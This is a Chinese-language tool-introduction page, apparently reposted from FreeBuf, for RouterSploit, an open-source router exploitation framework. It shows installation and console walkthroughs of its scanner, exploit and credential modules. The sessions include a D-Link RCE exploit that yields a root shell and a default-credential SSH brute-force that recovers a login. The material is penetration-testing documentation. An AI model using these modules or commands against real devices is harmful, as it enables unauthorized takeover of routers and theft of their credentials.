電子發燒友網>電子資料下載>電子資料>RouterSploit路由器漏洞檢測及利用框架

RouterSploit路由器漏洞檢測及利用框架

2512812 2022-05-06 | zip | 1.09 MB | 次下載 | 免費

普通下載普通下載

資料介紹

授權協議 B SD

開發語言 Python

操作系統 Linux

軟件類型開源軟件

所屬分類管理和監控、漏洞檢測掃描和評估

軟件簡介

RouteSploit框架是一款開源的漏洞檢測及利用框架，其針對的對象主要為路由器等嵌入式設備。

框架功能

RouteSploit框架主要由可用于滲透測試的多個功能模塊組件組成，

1、 Scanners：模塊功能主要為檢查目標設備是否存在可利用的安全漏洞；

2、Creds：模塊功能主要針對網絡服務的登錄認證口令進行檢測；

3、Exploits：模塊功能主要為識別到目標設備安全漏洞之后，對漏洞進行利用，實現提權等目的。

工具安裝

sudo?apt-get?install?python-requests?python-paramiko?python-netsnmpgit?clone?https://github.com/reverse-shell/routersploit?./rsf.py

GitHub地址如上命令中所述為：RouteSploit。

操作使用

首先，啟動RouteSploit框架，具體如下所示

root@kalidev:~/git/routersploit#?./rsf.py?
?______????????????_????????????_____???????_???????_?_
?|?___?\??????????|?|??????????/??___|?????|?|?????(_)?|
?|?|_/?/___??_???_|?|_?___?_?__\?`--.?_?__?|?|?___??_|?|_
?|????//?_?\|?|?|?|?__/?_?\?'__|`--.?\?'_?\|?|/?_?\|?|?__|
?|?|\?\?(_)?|?|_|?|?||??__/?|??/\__/?/?|_)?|?|?(_)?|?|?|_
?\_|?\_\___/?\__,_|\__\___|_|??\____/|?.__/|_|\___/|_|\__|
?????????????????????????????????????|?|
?????Router?Exploitation?Framework???|_|

?Dev?Team?:?Marcin?Bury?(lucyoa)?&?Mariusz?Kupidura?(fwkz)
?Codename?:?Wildest?Dreams?version??:?1.0.0

rsf?>

1、Scanners 模塊

scanners模塊，具備設備漏洞掃描功能，通過該模塊，可快速識別目標設備是否存在可利用的安全漏洞，下面會以一個dlink路由器為例，結合進行操作描述。

（1）選擇scanners模塊，操作如下，

rsf?>?use?scanners/dlink_scan
rsf?(D-Link?Scanner)?>?show?options

（2）顯示選項

Target?options:

???Name???????Current?settings?????Description????????????????????????????????
???----???????----------------?????-----------????????????????????????????????
???target??????????????????????????Target?address?e.g.?http://192.168.1.1?????
???port???????80???????????????????Target?port

（3）設置目標設備IP

rsf?(D-Link?Scanner)?>?set?target?192.168.1.1
[+]?{'target':?'192.168.1.1'}

（4）運行模塊，執行情況如下，

rsf?(D-Link?Scanner)?>?run
[+]?exploits/dlink/dwr_932_info_disclosure?is?vulnerable
[-]?exploits/dlink/dir_300_320_615_auth_bypass?is?not?vulnerable
[-]?exploits/dlink/dsl_2750b_info_disclosure?is?not?vulnerable
[-]?exploits/dlink/dns_320l_327l_rce?is?not?vulnerable
[-]?exploits/dlink/dir_645_password_disclosure?is?not?vulnerable
[-]?exploits/dlink/dir_300_600_615_info_disclosure?is?not?vulnerable
[-]?exploits/dlink/dir_300_600_rce?is?not?vulnerable

[+]?Device?is?vulnerable!
?-?exploits/dlink/dwr_932_info_disclosure

如上所呈現的結果，目標設備存在dwr_932_info_disclosure漏洞。接下來，我們選擇合適的payload進行傳遞和測試（以下涉及exploits模塊功能操作，如需，請再往下查閱），

2、Exploits 模塊

（1）選擇Exploits模塊，操作如下，

rsf?>?use?exploits/
exploits/2wire/?????exploits/asmax/?????exploits/asus/??????exploits/cisco/?????exploits/dlink/?????exploits/fortinet/??exploits/juniper/???exploits/linksys/???exploits/multi/?????exploits/netgear/
rsf?>?use?exploits/dlink/dir_300_600_rce
rsf?(D-LINK?DIR-300?&?DIR-600?RCE)?>

我們也可以使用“tab”鍵來自動補充輸入命令。

（2）顯示選項

rsf?(D-LINK?DIR-300?&?DIR-600?RCE)?>?show?options

Target?options:


???Name???????Current?settings?????Description????????????????????????????????
???----???????----------------?????-----------????????????????????????????????
???target??????????????????????????Target?address?e.g.?http://192.168.1.1?????
???port???????80???????????????????Target?Port

設置選項，操作如下，

rsf?(D-LINK?DIR-300?&?DIR-600?RCE)?>?set?target?http://192.168.1.1
[+]?{'target':?'http://192.168.1.1'}

（3）運行模塊

通過使用“run”或“exploit”命令來完成漏洞的利用，

rsf?(D-LINK?DIR-300?&?DIR-600?RCE)?>?run
[+]?Target?is?vulnerable
[*]?Invoking?command?loop...
cmd?>?whoami
root

也可檢測目標設備是否存在選定的安全漏洞，操作如下，

rsf?(D-LINK?DIR-300?&?DIR-600?RCE)?>?check
[+]?Target?is?vulnerable

（4）顯示具體漏洞信息

通過“show info”命令，顯示漏洞信息，包括其存在的設備品牌、型號、漏洞類型及參考來源，具體參考如下，

rsf?(D-LINK?DIR-300?&?DIR-600?RCE)?>?show?info

Name:
D-LINK?DIR-300?&?DIR-600?RCE

Description:
Module?exploits?D-Link?DIR-300,?DIR-600?Remote?Code?Execution?vulnerability?which?allows?executing?command?on?operating?system?level?with?root?privileges.

Targets:
-?D-Link?DIR?300
-?D-Link?DIR?600

Authors:
-?Michael?Messner??#?vulnerability?discovery
-?Marcin?Bury??#?routersploit?module

References:
-?http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router
-?http://www.s3cur1ty.de/home-Network-horror-days
-?http://www.s3cur1ty.de/m1adv2013-003

3、 Creds模塊

（1）選擇模塊

此模塊相關文件位于 /routesploit/modules/creds/ 目錄下，以下為該模塊支持檢測的服務，

? ftp?

? ssh

? telnet

? http basic auth

? http form auth

? snmp

在檢測過程中，可通過兩個層面對上述的每個服務進行檢測，

默認服務登錄口令檢測：利用框架提供的各類路由等設備以及服務的默認登錄口令字典，通過快速列舉的方式，可在較短時間內（幾秒鐘）驗證設備是否仍使用默認登錄口令；

暴力破解：利用框架中所提供的特定賬戶或者賬戶列表進行字典攻擊。其中包含兩個參數（登錄賬戶及密碼），如框架/routesploit/wordlists目錄中字典所示，參數值可以為一個單詞（如’admin’），或者是一整個單詞列表。

（2）控制臺

rsf?>?use?creds/
creds/ftp_bruteforce?????????creds/http_basic_bruteforce??creds/http_form_bruteforce???creds/snmp_bruteforce????????creds/ssh_default????????????creds/telnet_default?????????
creds/ftp_default????????????creds/http_basic_default?????creds/http_form_default??????creds/ssh_bruteforce?????????creds/telnet_bruteforce??????
rsf?>?use?creds/ssh_default
rsf?(SSH?Default?Creds)?>

（3）顯示選項

（4）設置目標設備IP

rsf?(SSH?Default?Creds)?>?set?target?192.168.1.53
[+]?{'target':?'192.168.1.53'}

（5）運行模塊

rsf?(SSH?Default?Creds)?>?run
[*]?Running?module...
[*]?worker-0?process?is?starting...
[*]?worker-1?process?is?starting...
[*]?worker-2?process?is?starting...
[*]?worker-3?process?is?starting...
[*]?worker-4?process?is?starting...
[*]?worker-5?process?is?starting...
[*]?worker-6?process?is?starting...
[*]?worker-7?process?is?starting...
[-]?worker-4?Authentication?failed.?Username:?'3comcso'?Password:?'RIP000'
[-]?worker-1?Authentication?failed.?Username:?'1234'?Password:?'1234'
[-]?worker-0?Authentication?failed.?Username:?'1111'?Password:?'1111'
[-]?worker-7?Authentication?failed.?Username:?'ADVMAIL'?Password:?'HP'
[-]?worker-3?Authentication?failed.?Username:?'266344'?Password:?'266344'
[-]?worker-2?Authentication?failed.?Username:?'1502'?Password:?'1502'

(..)

Elapsed?time:??38.9181981087?seconds
[+]?Credentials?found!

Login?????Password?????
-----?????--------?????
admin?????1234?????????

rsf?(SSH?Default?Creds)?>

介紹內容來自 FreeBuf黑客與極客